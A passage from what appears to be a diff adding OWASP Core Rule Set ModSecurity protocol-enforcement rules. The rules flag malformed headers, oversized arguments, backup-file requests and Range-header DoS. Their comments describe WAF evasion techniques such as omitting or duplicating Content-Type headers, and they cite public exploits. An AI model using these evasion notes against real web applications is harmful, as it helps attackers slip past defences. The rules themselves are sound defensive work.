severity:'NOTICE',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'" + +# +# Missing Content-Type Header with Request Body +# +# -=[ Rule Logic ]=- +# This rule will first check to see if the value of the Content-Length header is +# non-equal to 0. The chained rule is then checking the existence of the +# Content-Type header. The RFCs do not state there must be a +# Content-Type header. However, a request missing a Content-Header is a +# strong indication of a non-compliant browser. +# +# Also, omitting the CT header allows to bypass the Request Body Processor +# unless you set the optional tx.enforce_bodyproc_urlencoded variable. +# +# Note: in default settings, this behavior only provides a NOTICE and will +# not cause a request to be blocked. However, in paranoia level 2 or +# higher, we run sibling 920341, which DOES block these requests. +# +# -=[ References ]=- +# http://httpwg.org/specs/rfc7231.html#header.content-type + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ + "id:920340,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Request Containing Content, but Missing Content-Type header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'NOTICE',\ + chain" + SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.notice_anomaly_score}'" + +# Check that the host header is not an IP address +# This is not an HTTP RFC violation but it is indicative of automated client access. +# Many web-based worms propagate by scanning IP address blocks. +# +# -=[ Rule Logic ]=- +# This rule triggers if the Host header contains an IPv4 or IPv6 address, optionally +# extended with a port number. In the case of IPv6 we covering the address with square +# brackets and the address without square brackets. +# +# The regex consists of three main parts and said optional group: +# +# * IPv4 address +# * IPv6 address with square brackets +# * IPv6 address without square brackets +# * optional colon and port number +# +# Please note that the regex does not test the validity of the IP addresses. +# It just tries to detect a potential IP address. +# +# -=[ References ]=- +# https://technet.microsoft.com/en-us/magazine/2005.01.hackerbasher.aspx +# + +SecRule REQUEST_HEADERS:Host "@rx (?:^([\d.]+|\[[\da-f:]+\]|[\da-f:]+)(:[\d]+)?$)" \ + "id:920350,\ + phase:1,\ + block,\ + t:none,\ + msg:'Host header is a numeric IP address',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.warning_anomaly_score}'" + + +# In most cases, you should expect a certain volume of each a request on your +# website. For example, a request with 400 arguments, can be suspicious. +# This file creates limitations on the request. +# +# TODO Look at the rules in this file, and define the sizes you'd like to enforce. +# Note that most of the rules are commented out by default. +# Uncomment the rules you need +# + + +# +# Maximum number of arguments in request limited +# +SecRule &TX:MAX_NUM_ARGS "@eq 1" \ + "id:920380,\ + phase:2,\ + block,\ + t:none,\ + msg:'Too many arguments in request',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule &ARGS "@gt %{tx.max_num_args}" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +## -- Arguments limits -- +# +# Limit argument name length +# +SecRule &TX:ARG_NAME_LENGTH "@eq 1" \ + "id:920360,\ + phase:2,\ + block,\ + t:none,\ + msg:'Argument name too long',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule ARGS_NAMES "@gt %{tx.arg_name_length}" \ + "t:none,t:length,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Limit argument value length +# +# This rule is also triggered by an Apache Struts Remote Code Execution exploit: +# [ Apache Struts vulnerability CVE-2017-9791 - Exploit tested: https://www.exploit-db.com/exploits/42324 ] +# +SecRule &TX:ARG_LENGTH "@eq 1" \ + "id:920370,\ + phase:2,\ + block,\ + t:none,\ + msg:'Argument value too long',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule ARGS "@gt %{tx.arg_length}" \ + "t:none,t:length,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Limit arguments total length +# +SecRule &TX:TOTAL_ARG_LENGTH "@eq 1" \ + "id:920390,\ + phase:2,\ + block,\ + t:none,\ + msg:'Total arguments size exceeded',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule ARGS_COMBINED_SIZE "@gt %{tx.total_arg_length}" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -- File upload limits -- +# +# Individual file size is limited +SecRule &TX:MAX_FILE_SIZE "@eq 1" \ + "id:920400,\ + phase:1,\ + block,\ + t:none,\ + msg:'Uploaded file size too large',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_HEADERS:Content-Type "@rx ^(?i)multipart/form-data" \ + "chain" + SecRule REQUEST_HEADERS:Content-Length "@gt %{tx.max_file_size}" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Combined file size is limited +# +SecRule &TX:COMBINED_FILE_SIZES "@eq 1" \ + "id:920410,\ + phase:2,\ + block,\ + t:none,\ + msg:'Total uploaded files size too large',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule FILES_COMBINED_SIZE "@gt %{tx.combined_file_sizes}" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + + +# +# Restrict which content-types we accept. +# + +# Restrict Content-Type header to established patterns. +# +# This provides generic allow list protection against vulnerabilities like +# Apache Struts Content-Type arbitrary command execution (CVE-2017-5638). +# +# Examples of allowed patterns: +# - text/plain +# - text/plain; charset="UTF-8" +# - multipart/form-data; boundary=----WebKitFormBoundary12345 +# - application/soap+xml; charset=utf-8; action="urn:localhost-hwh#getQuestions" +# - application/*+json + +SecRule REQUEST_HEADERS:Content-Type "!@rx ^[\w/.+*-]+(?:\s?;\s?(?:action|boundary|charset|component|start(?:-info)?|type|version)\s?=\s?['\"\w.()+,/:=?<>@#*-]+)*$" \ + "id:920470,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Content-Type header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# In case Content-Type header can be parsed, check the mime-type against +# the policy defined in the 'allowed_request_content_type' variable. +# To change your policy, edit crs-setup.conf and activate rule 900220. +SecRule REQUEST_HEADERS:Content-Type "@rx ^[^;\s]+" \ + "id:920420,\ + phase:1,\ + block,\ + capture,\ + t:none,\ + msg:'Request content type is not allowed by policy',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.content_type=|%{tx.0}|',\ + chain" + SecRule TX:content_type "!@within %{tx.allowed_request_content_type}" \ + "t:lowercase,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# Restrict charset parameter within the content-type header +# +SecRule REQUEST_HEADERS:Content-Type "@rx charset\s*=\s*[\"']?([^;\"'\s]+)" \ + "id:920480,\ + phase:1,\ + block,\ + capture,\ + t:none,\ + msg:'Request content type charset is not allowed by policy',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.content_type_charset=|%{tx.1}|',\ + chain" + SecRule TX:content_type_charset "!@within %{tx.allowed_request_content_type_charset}" \ + "t:lowercase,\ + ctl:forceRequestBodyVariable=On,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict charset parameter inside content type header to occur max once. +# +SecRule REQUEST_HEADERS:Content-Type "@rx charset.*?charset" \ + "id:920530,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Multiple charsets detected in content type header',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict protocol versions. +# +SecRule REQUEST_PROTOCOL "!@within %{tx.allowed_http_versions}" \ + "id:920430,\ + phase:1,\ + block,\ + t:none,\ + msg:'HTTP protocol version is not allowed by policy',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict file extension +# +SecRule REQUEST_BASENAME "@rx \.([^.]+)$" \ + "id:920440,\ + phase:1,\ + block,\ + capture,\ + t:none,\ + msg:'URL file extension is restricted by policy',\ + logdata:'%{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.extension=.%{tx.1}/',\ + chain" + SecRule TX:EXTENSION "@within %{tx.restricted_extensions}" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Backup or "working" file extension +# example: index.php~, /index.php~/foo/ +# +SecRule REQUEST_FILENAME "@rx \.[^.~]+~(?:/.*|)$" \ + "id:920500,\ + phase:1,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Attempt to access a backup or working file',\ + logdata:'%{TX.0}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restricted HTTP headers +# +# -=[ Rule Logic ]=- +# The use of certain headers is restricted. They are listed in two variables: +# - TX.restricted_headers_basic: Known security risks, always forbidden (rule +# 920450) +# - TX.restricted_headers_extended: Possible false positives, possible security +# risks, may be forbidden (rule 920451) +# +# The headers are transformed into lowercase before the match. In order to make +# sure that only complete header names match, the names in the +# TX.restricted_headers_* variables are wrapped in slashes. This guarantees that +# the Range header (which becomes /range/) will not match the restricted +# /content-range/ header, for example. +# +# This is a chained rule, where the first rule fills a set of variables of the +# form TX.header_name__. The second rule is then executed +# for all variables of the form TX.header_name__. +# +# As a consequence of the construction of the rule, the alert message and the +# alert data will not display the original header name Content-Range, but +# /content-range/ instead. +# +# This rule has a stricter sibling, 920451, which matches against the variable +# TX.restricted_headers_extended. It handles deprecated headers that are still +# in use (so false positives are possible, hence unsuitable for blocking in a +# default paranoia level 1 installation) and headers with possible security +# risks. +# +# -=[ References ]=- +# https://access.redhat.com/security/vulnerabilities/httpoxy (Header Proxy) +# https://www.sidechannel.blog/en/http-method-override-what-it-is-and-how-a-pentester-can-use-it +# +SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ + "id:920450,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'HTTP header is restricted by policy (%{MATCHED_VAR})',\ + logdata:'Restricted header detected: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.header_name_920450_%{tx.0}=/%{tx.0}/',\ + chain" + SecRule TX:/^header_name_920450_/ "@within %{tx.restricted_headers_basic}" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Rule against CVE-2022-21907 +# This rule blocks Accept-Encoding headers longer than 50 characters. +# The length of 50 is a heuristic based on the length of values from +# the RFC (https://datatracker.ietf.org/doc/rfc9110/) +# and the respective values assigned by IANA +# (https://www.iana.org/assignments/http-parameters/http-parameters.xml#content-coding). +# +# This rule has a stricter sibling: 920521 +# +SecRule REQUEST_HEADERS:Accept-Encoding "@gt 50" \ + "id:920520,\ + phase:1,\ + block,\ + t:none,t:lowercase,t:length,\ + msg:'Accept-Encoding header exceeded sensible length',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Restrict response charsets that we allow. +# The following rules make sure that the response will be in an ASCII-compatible charset that +# phase 4 rules can properly understand and block. +# + +# +# Some servers rely on the request Accept header to determine what charset to respond with. +# This rule restricts these to familiar charsets. +# +# Regular expression generated from regex-assembly/920600.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 920600 +# +SecRule REQUEST_HEADERS:Accept "!@rx ^(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*(?:[\s\v]*,[\s\v]*(?:(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)/(?:\*|[^!-\"\(-\),/:-\?\[-\]\{\}]+)|\*)(?:[\s\v]*;[\s\v]*(?:charset[\s\v]*=[\s\v]*\"?(?:iso-8859-15?|utf-8|windows-1252)\b\"?|(?:[^\s\v -\"\(-\),/:-\?\[-\]c\{\}]|c(?:[^!-\"\(-\),/:-\?\[-\]h\{\}]|h(?:[^!-\"\(-\),/:-\?\[-\]a\{\}]|a(?:[^!-\"\(-\),/:-\?\[-\]r\{\}]|r(?:[^!-\"\(-\),/:-\?\[-\]s\{\}]|s(?:[^!-\"\(-\),/:-\?\[-\]e\{\}]|e[^!-\"\(-\),/:-\?\[-\]t\{\}]))))))[^!-\"\(-\),/:-\?\[-\]\{\}]*[\s\v]*=[\s\v]*[^!\(-\),/:-\?\[-\]\{\}]+);?)*)*$" \ + "id:920600,\ + phase:1,\ + block,\ + t:none,t:lowercase,\ + msg:'Illegal Accept header: charset parameter',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Unicode character bypass check for non JSON requests +# See reported bypass in issue: +# https://github.com/coreruleset/coreruleset/issues/2512 +# +SecRule REQBODY_PROCESSOR "!@streq JSON" \ + "id:920540,\ + phase:2,\ + block,\ + t:none,\ + msg:'Possible Unicode character bypass detected',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/72',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@rx (?i)\x5cu[0-9a-f]{4}" \ + "setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# Disallow any raw URL fragments. The '#' character should be omitted or URL-encoded. +# CRS rules generally do not check REQUEST_URI_RAW, but some servers accept the fragment as part of the URL path/query. +# This creates false negative evasions. +# +SecRule REQUEST_URI_RAW "@contains #" \ + "id:920610,\ + phase:1,\ + block,\ + t:none,\ + msg:'Raw (unencoded) fragment in request URI',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# +# The following rule (920620) checks for the presence of 2 or more request Content-Type headers. +# Content-Type confusion poses a significant security risk to a web application. It occurs when +# the server and client have different interpretations of the Content-Type header, leading to +# miscommunication, potential exploitation and WAF bypass. +# +# Using Apache, when multiple Content-Type request headers are received, the server combines them +# into a single header with the values separated by commas. For example, if a client sends multiple +# Content-Type headers with values "application/json" and "text/plain", Apache will combine them +# into a single header like this: "Content-Type: application/json, text/plain". +# +# On the other hand, Nginx handles multiple Content-Type headers differently. It preserves each +# header as a separate entity without combining them. So, if a client sends multiple Content-Type +# headers, Nginx will keep them separate, maintaining the original values. +# +SecRule &REQUEST_HEADERS:Content-Type "@gt 1" \ + "id:920620,\ + phase:1,\ + block,\ + t:none,\ + msg:'Multiple Content-Type Request Headers',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920013,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:920014,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# + +# +# -=[ Rule Logic ]=- +# +# Check the number of range fields in the Range request header. +# +# An excessive number of Range request headers can be used to DoS a server. +# The original CVE proposed an arbitrary upper limit of 5 range fields. +# +# Several clients are known to request PDF fields with up to 62 range +# fields. Therefore the standard rule does not cover PDF files. This is +# performed in two separate (stricter) siblings of this rule. +# +# 920200: PL2: Limit of 5 range header fields for all filenames outside of PDFs +# 920201: PL2: Limit of 62 range header fields for PDFs +# 920202: PL4: Limit of 5 range header fields for PDFs +# +# -=[ References ]=- +# https://httpd.apache.org/security/CVE-2011-3192.txt + + +SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){6}" \ + "id:920200,\ + phase:1,\ + block,\ + t:none,\ + msg:'Range: Too many fields (6 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_BASENAME "!@endsWith .pdf" \ + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + +# +# This is a sibling of rule 920200 +# + +SecRule REQUEST_BASENAME "@endsWith .pdf" \ + "id:920201,\ + phase:1,\ + block,\ + t:none,\ + msg:'Range: Too many fields for pdf request (63 or more)',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + chain" + SecRule REQUEST_HEADERS:Range|REQUEST_HEADERS:Request-Range "@rx ^bytes=(?:(?:\d+)?-(?:\d+)?\s*,?\s*){63}" \ + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + + +SecRule ARGS "@rx %[0-9a-fA-F]{2}" \ + "id:920230,\ + phase:2,\ + block,\ + t:none,\ + msg:'Multiple URL Encoding Detected',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/255/153/267/120',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'WARNING',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'" + + +# +# PL2: This is a stricter sibling of 920270. +# +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES "@validateByteRange 9,10,13,32-126,128-255" \ + "id:920271,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (non printable characters)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + + +# +# Missing User-Agent Header +# +# -=[ Rule Logic ]=- +# This rules will check to see if there is a User-Agent header or not. +# + +SecRule &REQUEST_HEADERS:User-Agent "@eq 0" \ + "id:920320,\ + phase:1,\ + pass,\ + t:none,\ + msg:'Missing User Agent Header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/6.5.10',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'NOTICE',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.notice_anomaly_score}'" + + +# +# PL2: This is a stricter sibling of 920120. +# +SecRule FILES_NAMES|FILES "@rx ['\";=]" \ + "id:920121,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Attempted multipart/form-data bypass',\ + logdata:'%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# PL2: Block on Missing Content-Type Header with Request Body +# This is a stricter sibling of rule 920340. +# +# -=[ References ]=- +# http://httpwg.org/specs/rfc7231.html#header.content-type + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^0$" \ + "id:920341,\ + phase:1,\ + block,\ + t:none,\ + msg:'Request Containing Content Requires Content-Type header',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + chain" + SecRule &REQUEST_HEADERS:Content-Type "@eq 0" \ + "t:none,\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +# +# PL2: This is a stricter sibling of 920450. +# +SecRule REQUEST_HEADERS_NAMES "@rx ^.*$" \ + "id:920451,\ + phase:1,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'HTTP header is restricted by policy (%{MATCHED_VAR})',\ + logdata:'Restricted header detected: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'paranoia-level/2',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'PCI/12.1',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + setvar:'tx.header_name_920451_%{tx.0}=/%{tx.0}/',\ + chain" + SecRule TX:/^header_name_920451_/ "@within %{tx.restricted_headers_extended}" \ + "setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920015,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:920016,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +# +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) +# + +# +# PL 3: This is a stricter sibling of 920270. Ascii range: Printable characters in the low range +# +# This rule is also triggered by the following exploit(s): +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +SecRule REQUEST_URI|REQUEST_HEADERS|ARGS|ARGS_NAMES|REQUEST_BODY "@validateByteRange 32-36,38-126" \ + "id:920272,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,\ + msg:'Invalid character in request (outside of printable chars below ascii 127)',\ + logdata:'%{MATCHED_VAR_NAME}=%{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-protocol',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/210/272',\ + tag:'paranoia-level/3',\ + ver:'OWASP_CRS/4.0.0-rc2',\ + severity:'CRITICAL',\ + 